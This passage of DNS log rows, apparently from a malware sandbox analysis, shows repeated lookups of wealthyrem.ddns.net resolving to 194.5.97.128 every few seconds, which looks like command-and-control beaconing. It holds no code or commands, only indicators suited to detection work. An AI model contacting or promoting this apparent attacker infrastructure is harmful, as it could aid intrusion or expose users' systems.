Aug 3, 2021 19:07:37.205674887 CEST	192.168.2.3	8.8.8.8	0xa36	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:39.391149044 CEST	192.168.2.3	8.8.8.8	0x1bcf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:41.593108892 CEST	192.168.2.3	8.8.8.8	0x30fb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:43.791191101 CEST	192.168.2.3	8.8.8.8	0xd400	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:45.981834888 CEST	192.168.2.3	8.8.8.8	0xf1d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:48.208339930 CEST	192.168.2.3	8.8.8.8	0xeebb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:50.405112028 CEST	192.168.2.3	8.8.8.8	0x55eb	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:52.700977087 CEST	192.168.2.3	8.8.8.8	0x9b87	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:54.903065920 CEST	192.168.2.3	8.8.8.8	0x8cea	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:57.106620073 CEST	192.168.2.3	8.8.8.8	0xbf11	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:59.292171955 CEST	192.168.2.3	8.8.8.8	0x1642	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:01.496685028 CEST	192.168.2.3	8.8.8.8	0x6602	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:08:03.698606014 CEST	192.168.2.3	8.8.8.8	0x2043	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 3, 2021 19:01:32.150788069 CEST	8.8.8.8	192.168.2.3	0x4f55	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:34.349643946 CEST	8.8.8.8	192.168.2.3	0xc0f9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:36.548902035 CEST	8.8.8.8	192.168.2.3	0xb853	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:38.753732920 CEST	8.8.8.8	192.168.2.3	0x4c0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:40.941567898 CEST	8.8.8.8	192.168.2.3	0x8464	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:43.134553909 CEST	8.8.8.8	192.168.2.3	0x1298	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:45.317775965 CEST	8.8.8.8	192.168.2.3	0x2508	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:47.786495924 CEST	8.8.8.8	192.168.2.3	0x95dd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:50.345753908 CEST	8.8.8.8	192.168.2.3	0x91d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:52.544380903 CEST	8.8.8.8	192.168.2.3	0x3f8e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:54.762475014 CEST	8.8.8.8	192.168.2.3	0x64f4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:56.959481955 CEST	8.8.8.8	192.168.2.3	0x58e4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:59.165488958 CEST	8.8.8.8	192.168.2.3	0xae14	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:01.352756977 CEST	8.8.8.8	192.168.2.3	0x9d7b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:03.588093042 CEST	8.8.8.8	192.168.2.3	0xf106	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:07.945453882 CEST	8.8.8.8	192.168.2.3	0xcfbc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:10.148989916 CEST	8.8.8.8	192.168.2.3	0xb28d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:12.380321980 CEST	8.8.8.8	192.168.2.3	0xf8d3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:14.720417976 CEST	8.8.8.8	192.168.2.3	0xabd4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:16.986277103 CEST	8.8.8.8	192.168.2.3	0x296	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:19.246603966 CEST	8.8.8.8	192.168.2.3	0x4268	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:21.462229967 CEST	8.8.8.8	192.168.2.3	0xb8c4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:23.651187897 CEST	8.8.8.8	192.168.2.3	0xd8c3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:25.846793890 CEST	8.8.8.8	192.168.2.3	0xe46d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:28.050857067 CEST	8.8.8.8	192.168.2.3	0xe1a4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:30.252289057 CEST	8.8.8.8	192.168.2.3	0x95e9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:32.456573009 CEST	8.8.8.8	192.168.2.3	0xef1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:34.704158068 CEST	8.8.8.8	192.168.2.3	0xb849	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:36.915652990 CEST	8.8.8.8	192.168.2.3	0x4e81	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:39.113240957 CEST	8.8.8.8	192.168.2.3	0xd3b6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:41.475824118 CEST	8.8.8.8	192.168.2.3	0x6608	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:43.676137924 CEST	8.8.8.8	192.168.2.3	0x7d7e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:45.884254932 CEST	8.8.8.8	192.168.2.3	0x8d99	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:48.070511103 CEST	8.8.8.8	192.168.2.3	0xbc7c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:50.297590971 CEST	8.8.8.8	192.168.2.3	0xf886	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:52.508933067 CEST	8.8.8.8	192.168.2.3	0xff	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:54.752672911 CEST	8.8.8.8	192.168.2.3	0x7c6b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:57.072422028 CEST	8.8.8.8	192.168.2.3	0xd11b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:00.250510931 CEST	8.8.8.8	192.168.2.3	0x8a1b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:02.455005884 CEST	8.8.8.8	192.168.2.3	0xa63	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:04.646204948 CEST	8.8.8.8	192.168.2.3	0x48fd	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:06.928741932 CEST	8.8.8.8	192.168.2.3	0x9167	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:09.116533041 CEST	8.8.8.8	192.168.2.3	0x62ed	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:11.308238029 CEST	8.8.8.8	192.168.2.3	0xf165	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:13.514050961 CEST	8.8.8.8	192.168.2.3	0x3d90	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:15.711858988 CEST	8.8.8.8	192.168.2.3	0xf3a8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:17.903259039 CEST	8.8.8.8	192.168.2.3	0x1e50	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:20.122246981 CEST	8.8.8.8	192.168.2.3	0xea4b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:22.355321884 CEST	8.8.8.8	192.168.2.3	0x9268	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:24.558729887 CEST	8.8.8.8	192.168.2.3	0x2dba	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:26.767282009 CEST	8.8.8.8	192.168.2.3	0xe4f0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:28.955493927 CEST	8.8.8.8	192.168.2.3	0xf843	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:31.168095112 CEST	8.8.8.8	192.168.2.3	0x7112	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:33.353689909 CEST	8.8.8.8	192.168.2.3	0x5739	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:35.545561075 CEST	8.8.8.8	192.168.2.3	0x752	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:37.810373068 CEST	8.8.8.8	192.168.2.3	0xa606	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:40.006287098 CEST	8.8.8.8	192.168.2.3	0x5794	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:42.196994066 CEST	8.8.8.8	192.168.2.3	0xc21d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:44.389393091 CEST	8.8.8.8	192.168.2.3	0x50ae	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:46.604208946 CEST	8.8.8.8	192.168.2.3	0xab70	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:48.798176050 CEST	8.8.8.8	192.168.2.3	0xf7a2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:50.985971928 CEST	8.8.8.8	192.168.2.3	0xc7d0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:53.231578112 CEST	8.8.8.8	192.168.2.3	0x2ac8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:55.451174021 CEST	8.8.8.8	192.168.2.3	0xdb67	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:57.659317017 CEST	8.8.8.8	192.168.2.3	0x8876	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:59.858313084 CEST	8.8.8.8	192.168.2.3	0xdd4a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:02.451447010 CEST	8.8.8.8	192.168.2.3	0x40a4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:05.058403969 CEST	8.8.8.8	192.168.2.3	0xc20b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:07.278501987 CEST	8.8.8.8	192.168.2.3	0xe42a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:09.519002914 CEST	8.8.8.8	192.168.2.3	0xba28	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:11.806792974 CEST	8.8.8.8	192.168.2.3	0xddb0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:14.118324041 CEST	8.8.8.8	192.168.2.3	0xfeb0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.308108091 CEST	8.8.8.8	192.168.2.3	0xa694	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.920137882 CEST	8.8.8.8	192.168.2.3	0xdfc2	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 19:04:18.513947010 CEST	8.8.8.8	192.168.2.3	0xa8c7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:20.731728077 CEST	8.8.8.8	192.168.2.3	0x5126	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:22.938019991 CEST	8.8.8.8	192.168.2.3	0xa630	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:25.258712053 CEST	8.8.8.8	192.168.2.3	0xf5b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:27.443067074 CEST	8.8.8.8	192.168.2.3	0xc235	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:29.647238970 CEST	8.8.8.8	192.168.2.3	0x7a7c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:32.033607960 CEST	8.8.8.8	192.168.2.3	0xd305	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:34.233795881 CEST	8.8.8.8	192.168.2.3	0x8c28	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:36.463515043 CEST	8.8.8.8	192.168.2.3	0x8a03	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:38.686813116 CEST	8.8.8.8	192.168.2.3	0x6df8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:40.992608070 CEST	8.8.8.8	192.168.2.3	0x5512	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:43.237854958 CEST	8.8.8.8	192.168.2.3	0x346e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:45.437777042 CEST	8.8.8.8	192.168.2.3	0xbe48	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:47.660789967 CEST	8.8.8.8	192.168.2.3	0x2dc6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:49.880382061 CEST	8.8.8.8	192.168.2.3	0x5442	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:52.111000061 CEST	8.8.8.8	192.168.2.3	0x907d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:54.321608067 CEST	8.8.8.8	192.168.2.3	0x3c36	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:56.613110065 CEST	8.8.8.8	192.168.2.3	0x68b3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:58.823889971 CEST	8.8.8.8	192.168.2.3	0x9bf3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:01.053582907 CEST	8.8.8.8	192.168.2.3	0x9486	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:03.279337883 CEST	8.8.8.8	192.168.2.3	0xed32	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:05.506740093 CEST	8.8.8.8	192.168.2.3	0x26d6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:07.727588892 CEST	8.8.8.8	192.168.2.3	0xef65	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:10.224415064 CEST	8.8.8.8	192.168.2.3	0x173b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:12.749973059 CEST	8.8.8.8	192.168.2.3	0x71dc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:14.958893061 CEST	8.8.8.8	192.168.2.3	0xcd49	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:17.145004988 CEST	8.8.8.8	192.168.2.3	0x954d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:19.365232944 CEST	8.8.8.8	192.168.2.3	0x4205	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:21.552804947 CEST	8.8.8.8	192.168.2.3	0x8926	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:23.757006884 CEST	8.8.8.8	192.168.2.3	0x821	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:25.959387064 CEST	8.8.8.8	192.168.2.3	0x96ce	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:28.191822052 CEST	8.8.8.8	192.168.2.3	0x4e8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:30.381278038 CEST	8.8.8.8	192.168.2.3	0xa5e8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:32.573491096 CEST	8.8.8.8	192.168.2.3	0x555d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:34.744133949 CEST	8.8.8.8	192.168.2.3	0x5059	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:36.961061954 CEST	8.8.8.8	192.168.2.3	0x7b1b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:39.165993929 CEST	8.8.8.8	192.168.2.3	0x428e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:41.342091084 CEST	8.8.8.8	192.168.2.3	0x8b71	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:43.572525024 CEST	8.8.8.8	192.168.2.3	0x8af6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:45.787534952 CEST	8.8.8.8	192.168.2.3	0x86b1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:47.976157904 CEST	8.8.8.8	192.168.2.3	0x2a2a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:50.160826921 CEST	8.8.8.8	192.168.2.3	0x278f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:52.357184887 CEST	8.8.8.8	192.168.2.3	0x62f6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:54.568398952 CEST	8.8.8.8	192.168.2.3	0x9faf	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:56.756485939 CEST	8.8.8.8	192.168.2.3	0x7fcc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:58.990415096 CEST	8.8.8.8	192.168.2.3	0x4bf7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:01.181267023 CEST	8.8.8.8	192.168.2.3	0xab5e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:03.364897013 CEST	8.8.8.8	192.168.2.3	0xc0e9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:05.585144997 CEST	8.8.8.8	192.168.2.3	0xc40d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:07.775700092 CEST	8.8.8.8	192.168.2.3	0x3c4c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:09.969455957 CEST	8.8.8.8	192.168.2.3	0xba84	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:12.181878090 CEST	8.8.8.8	192.168.2.3	0x71aa	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:15.233902931 CEST	8.8.8.8	192.168.2.3	0x1519	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:17.436507940 CEST	8.8.8.8	192.168.2.3	0x4316	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:19.619803905 CEST	8.8.8.8	192.168.2.3	0xd753	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:21.808489084 CEST	8.8.8.8	192.168.2.3	0x1990	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:23.992546082 CEST	8.8.8.8	192.168.2.3	0x3ede	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:26.202452898 CEST	8.8.8.8	192.168.2.3	0xe3a2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:28.401519060 CEST	8.8.8.8	192.168.2.3	0x667	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:30.626837969 CEST	8.8.8.8	192.168.2.3	0xcc52	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:32.831609011 CEST	8.8.8.8	192.168.2.3	0xd900	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:35.025839090 CEST	8.8.8.8	192.168.2.3	0xe662	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:37.231322050 CEST	8.8.8.8	192.168.2.3	0x75a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:39.421473026 CEST	8.8.8.8	192.168.2.3	0xbb11	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:41.665680885 CEST	8.8.8.8	192.168.2.3	0x1152	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:43.874284983 CEST	8.8.8.8	192.168.2.3	0x997c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:46.092864037 CEST	8.8.8.8	192.168.2.3	0x8a48	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:48.294316053 CEST	8.8.8.8	192.168.2.3	0xc1c6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:50.514136076 CEST	8.8.8.8	192.168.2.3	0x75e3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:52.690589905 CEST	8.8.8.8	192.168.2.3	0xf2df	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:54.903347015 CEST	8.8.8.8	192.168.2.3	0x7414	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:57.096909046 CEST	8.8.8.8	192.168.2.3	0x5c6f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:59.308945894 CEST	8.8.8.8	192.168.2.3	0x25b1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:01.572048903 CEST	8.8.8.8	192.168.2.3	0xa7a9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:03.779144049 CEST	8.8.8.8	192.168.2.3	0x7bc4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:05.974879980 CEST	8.8.8.8	192.168.2.3	0xbda9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:08.178571939 CEST	8.8.8.8	192.168.2.3	0x106b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:10.413378954 CEST	8.8.8.8	192.168.2.3	0x458d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:12.616333008 CEST	8.8.8.8	192.168.2.3	0x33bc	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:14.823110104 CEST	8.8.8.8	192.168.2.3	0x57de	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:17.267951012 CEST	8.8.8.8	192.168.2.3	0x2f60	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:19.534274101 CEST	8.8.8.8	192.168.2.3	0x4f1a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
